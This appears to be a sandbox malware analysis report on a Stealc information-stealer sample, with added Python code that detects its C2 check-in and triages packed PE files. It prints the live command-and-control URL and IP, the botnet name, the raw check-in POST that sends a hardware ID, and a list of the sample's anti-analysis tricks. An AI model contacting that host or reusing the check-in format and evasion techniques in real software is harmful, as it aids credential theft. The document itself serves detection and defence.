Windows Analysis Report
XDPT5mgIBO.exe

Overview

General Information

Sample name: XDPT5mgIBO.exe (renamed because the original name is a hash value)
Original sample name: 6764f657774334189cbecc80dbb3c855.exe
Analysis ID: 1527619
MD5: 6764f657774334189cbecc80dbb3c855
SHA1: 9f597f7e92400f0c83f6166d1ec4a9228b3c5514
SHA256: ef31a45fb90a7cae12898b6f16cf2c48c06d75ca03f5aaf4fc48bbbd1385be11
Tags: 32, exe, trojan

Detection

Stealc
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XDPT5mgIBO.exe (PID: 5928 cmdline: "C:\Users\user\Desktop\XDPT5mgIBO.exe" MD5: 6764F657774334189CBECC80DBB3C855)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data-collection settings whose development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: XDPT5mgIBO.exe PID: 5928 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: XDPT5mgIBO.exe PID: 5928 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.XDPT5mgIBO.exe.640000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched
Suricata alert (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-10-07T06:47:05.536145+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6:49711 | 185.215.113.37:80 | TCP


                AV Detection

Source: XDPT5mgIBO.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.XDPT5mgIBO.exe.640000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: XDPT5mgIBO.exe | Virustotal: Detection: 53%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: XDPT5mgIBO.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0064C820
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00647240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00647240
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00649AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00649AC0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00649B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00649B60
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00658EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00658EA0
Source: XDPT5mgIBO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_006538B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00654910
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0064DA80
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0064E430
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00654570
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0064ED20
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0064BE70
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0064DE10
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006416D0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00653EA0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0064F6B0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a | Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00644880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00644880
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001402000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&F
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.G
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php09
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO9
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e9
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37d
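The check-in POST captured above is the traffic the Suricata alert fired on: a multipart form with only a hardware ID and the build name ("doma", matching the extracted configuration), sent to a .php path with no User-Agent header. The following is an added example, not Joe Sandbox or Stealc code: it rebuilds the request from the report's "Data Ascii" field, parses the multipart body into its fields, and scores the request against a set of indicators that are my own reading of the capture (POST to a .php path, no User-Agent, a boundary of four dashes plus 20 upper-case letters, exactly the fields hwid and build), not the text of rule 2044243. The benign upload used as a negative control is constructed.

```python
"""Parse and classify the Stealc check-in POST shown in the report.

Added example, not Joe Sandbox or Stealc code.  The request bytes are rebuilt
from the report's "Data Ascii" field (Content-Length 211); the indicators are
my own reading of the capture, not the text of Suricata rule 2044243.
"""
import re

# Constructed from the capture in the report; the HWID and build name are the
# values the sandbox observed.
CHECKIN_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------EGIJEBGDAFHIJJKEHCAA\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"711213AE2D294266498721\r\n"
    b"------EGIJEBGDAFHIJJKEHCAA\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------EGIJEBGDAFHIJJKEHCAA--\r\n"
)

# Constructed negative control: an ordinary browser-style file upload.
BENIGN_UPLOAD = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: files.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=WebKitFormBoundary7MA4YWxk\r\n"
    b"\r\n"
    b"--WebKitFormBoundary7MA4YWxk\r\n"
    b'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
    b"\r\n"
    b"hello\r\n"
    b"--WebKitFormBoundary7MA4YWxk--\r\n"
)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter)[1:]:      # [0] is the preamble
        if part.startswith(b"--"):              # closing "--boundary--"
            break
        part_head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_head)
        if match:
            fields[match.group(1).decode()] = value.rstrip(b"\r\n").decode("latin-1")
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Extract the form fields and score the request against the indicators."""
    method, path, headers, body = parse_http_request(raw)
    match = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    boundary = match.group(1) if match else ""
    fields = parse_multipart(body, boundary) if boundary else {}
    indicators = {
        "post_to_php": method == "POST" and path.endswith(".php"),
        "no_user_agent": "user-agent" not in headers,
        "dash_alpha_boundary": re.fullmatch(r"-{4}[A-Z]{20}", boundary) is not None,
        "hwid_and_build_only": set(fields) == {"hwid", "build"},
    }
    return {"fields": fields, "indicators": indicators,
            "stealc_checkin": all(indicators.values())}


if __name__ == "__main__":
    for name, request in (("capture", CHECKIN_REQUEST), ("benign", BENIGN_UPLOAD)):
        print(name, classify_checkin(request))
```

The four indicators are deliberately weak on their own (plenty of legitimate clients omit a User-Agent, and form uploads to .php are everywhere); it is the conjunction, and above all the hwid/build pair, that is specific. Feeding the parser with a proxy log or a pcap extract is enough to pull the build name out of each check-in, which is the same field the configuration extractor reports as "Botnet".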

                System Summary

Source: XDPT5mgIBO.exe | Static PE information: section name: (empty or non-printable)
Source: XDPT5mgIBO.exe | Static PE information: section name: .rsrc
Source: XDPT5mgIBO.exe | Static PE information: section name: .idata
Source: XDPT5mgIBO.exe | Static PE information: section name: (empty or non-printable)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code functions: 0_2_009C4888, 0_2_00A0D02A, 0_2_00A12074, 0_2_008BF870, 0_2_008DE9CC, 0_2_008E09E9, 0_2_009222A7, 0_2_00A09A41, 0_2_00A13B86, 0_2_00933B55, 0_2_00A10C87, 0_2_00A06487, 0_2_009DFCFC, 0_2_008EFCF6, 0_2_00A5545A, 0_2_00A155A1, 0_2_009F6DCC, 0_2_009A05FD, 0_2_00911E8B, 0_2_00AA5E2F, 0_2_00A0B602, 0_2_0096363F, 0_2_009C8FCF, 0_2_00A07FCF
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: String function: 006445C0 appears 316 times
Source: XDPT5mgIBO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: XDPT5mgIBO.exe | Static PE information: Section: ogawuknu ZLIB complexity 0.9949054810160024
Source: XDPT5mgIBO.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: XDPT5mgIBO.exe, 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00659600
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00653720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00653720
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\OD4RT2OV.htm
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: XDPT5mgIBO.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: XDPT5mgIBO.exe | Static file information: File size 1852416 > 1048576
Source: XDPT5mgIBO.exe | Static PE information: Raw size of ogawuknu is bigger than: 0x100000 < 0x19e000
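Several of the static findings in this report (the oversized, near-incompressible ogawuknu section, the unnamed and randomly named sections, and the header checksum that does not match the file) are the standard packer tells a triage script checks before any dynamic run. The block below is an added example, not Joe Sandbox code: pe_checksum() implements the documented PE CheckSum algorithm (32-bit word sum with carry folding, skipping the CheckSum field itself, plus the file length), shannon_entropy() gives bits per byte, and triage_sections() flags the section-table properties the report lists. The section table in demo_findings() is constructed to mirror the report's section names and rights; its bytes are synthetic, not taken from the sample.

```python
"""Static PE checks behind the report's checksum, entropy and section-name signatures.

Added example, not Joe Sandbox code.  The section table in demo_findings() is
constructed to resemble the report's; the raw bytes are synthetic.
"""
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                  ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", "CODE", "DATA"}
CODE_NAMES = {".text", "CODE"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute OptionalHeader.CheckSum over a whole file image.

    checksum_offset is the file offset of the 4-byte CheckSum field
    (e_lfanew + 0x58 for both PE32 and PE32+); that dword is skipped.
    """
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for offset in range(0, len(padded), 4):
        if offset == checksum_offset & ~3:
            continue
        total += struct.unpack_from("<I", padded, offset)[0]
        if total >= 1 << 32:                 # fold the carry back into the sum
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)      # original length, not the padded one


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is incompressible (packed or encrypted), 0.0 is constant."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage_sections(sections, entry_rva: int, entropy_threshold: float = 7.5):
    """sections: (name, virtual_address, virtual_size, characteristics, raw_bytes).
    Returns the findings a triage analyst would flag, as plain strings."""
    findings = []
    for name, va, vsize, chars, raw in sections:
        label = repr(name) if name.strip() else "<empty name>"
        if not name.strip():
            findings.append("section with empty or non-printable name")
        elif name not in STANDARD_NAMES:
            findings.append(f"non-standard section name {label}")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {label} is both writable and executable")
        entropy = shannon_entropy(raw)
        if entropy > entropy_threshold:
            findings.append(f"section {label} entropy {entropy:.2f} (likely packed)")
        if va <= entry_rva < va + vsize and name not in CODE_NAMES:
            findings.append(f"entry point 0x{entry_rva:X} lies in {label}, not a code section")
    return findings


def demo_findings():
    """Constructed section table shaped like the report's (names, rights, packed data)."""
    ew = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    sections = [
        ("",         0x1000,   0x1000,   ew,                  b"\x90" * 64),
        (".rsrc",    0x2000,   0x1000,   IMAGE_SCN_MEM_WRITE, b"\0" * 64),
        (".idata",   0x3000,   0x1000,   IMAGE_SCN_MEM_WRITE, b"\0" * 64),
        ("ogawuknu", 0x4000,   0x19E000, ew,                  bytes(range(256)) * 4),
        ("hgmhlbrt", 0x1A2000, 0x1000,   ew,                  b"\0" * 64),
        (".taggant", 0x1A3000, 0x1000,   ew,                  b"\xCC" * 64),
    ]
    return triage_sections(sections, entry_rva=0x1A3010)


if __name__ == "__main__":
    for finding in demo_findings():
        print(finding)
```

For the real file the comparison the report makes is pe_checksum(file_bytes, e_lfanew + 0x58) against the stored value; a mismatch on its own only means the header was not regenerated after the image was modified, which is exactly what a packer that rewrites sections tends to leave behind. Entropy close to 8 bits per byte over a multi-megabyte section is the stronger signal, and is what the ZLIB complexity of 0.99 for ogawuknu is expressing in another form.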

                Data Obfuscation

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Unpacked PE file: 0.2.XDPT5mgIBO.exe.640000.0.unpack | section rights, unpacked image vs. original file: (unnamed) EW vs ER; .rsrc W vs W; .idata W vs W; (unnamed) EW vs EW; ogawuknu EW vs EW; hgmhlbrt EW vs EW; .taggant EW vs EW
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00659860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: XDPT5mgIBO.exe | Static PE information: real checksum: 0x1c74d3 should be: 0x1cbc26
Source: XDPT5mgIBO.exe | Static PE information: section names: (empty or non-printable), .rsrc, .idata, (empty or non-printable), ogawuknu, hgmhlbrt, .taggant
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00B010A0 push edx; mov dword ptr [esp], ecx | 0_2_00B010BD
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_009C4888 push 784E2553h; mov dword ptr [esp], ebx | 0_2_009C4940
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_009C4888 push eax; mov dword ptr [esp], esp | 0_2_009C496B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_009C4888 push ebp; mov dword ptr [esp], 29AF872Dh | 0_2_009C4A13
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_009C4888 push esi; mov dword ptr [esp], eax | 0_2_009C4A87
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_009C4888 push edx; mov dword ptr [esp], ebp | 0_2_009C4A8B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_0065B035 push ecx; ret | 0_2_0065B048
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A750FF push 1249C73Bh; mov dword ptr [esp], edx | 0_2_00A75123
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00ADD028 push 3FE43887h; mov dword ptr [esp], esi | 0_2_00ADD031
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00ADD028 push edx; mov dword ptr [esp], ebx | 0_2_00ADD03A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 150092ECh; mov dword ptr [esp], esp | 0_2_00A0D049
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 3F4DC2A3h; mov dword ptr [esp], esi | 0_2_00A0D141
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 3D8497E0h; mov dword ptr [esp], edi | 0_2_00A0D16E
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 6D32BA32h; mov dword ptr [esp], ebx | 0_2_00A0D1A8
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push ecx; mov dword ptr [esp], ebp | 0_2_00A0D240
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 63C14947h; mov dword ptr [esp], esi | 0_2_00A0D259
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 08FE84AAh; mov dword ptr [esp], ecx | 0_2_00A0D2B1
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 45E89993h; mov dword ptr [esp], esi | 0_2_00A0D314
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 15A22B5Ch; mov dword ptr [esp], edx | 0_2_00A0D3A7
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push edi; mov dword ptr [esp], 4977C910h | 0_2_00A0D3EA
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push eax; mov dword ptr [esp], 7EDD835Ch | 0_2_00A0D42E
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax | 0_2_00A0D464
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax | 0_2_00A0D47F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push ecx; mov dword ptr [esp], 7BF5FF9Ch | 0_2_00A0D483
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push 66E731C2h; mov dword ptr [esp], edx | 0_2_00A0D4C8
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax | 0_2_00A0D4CC
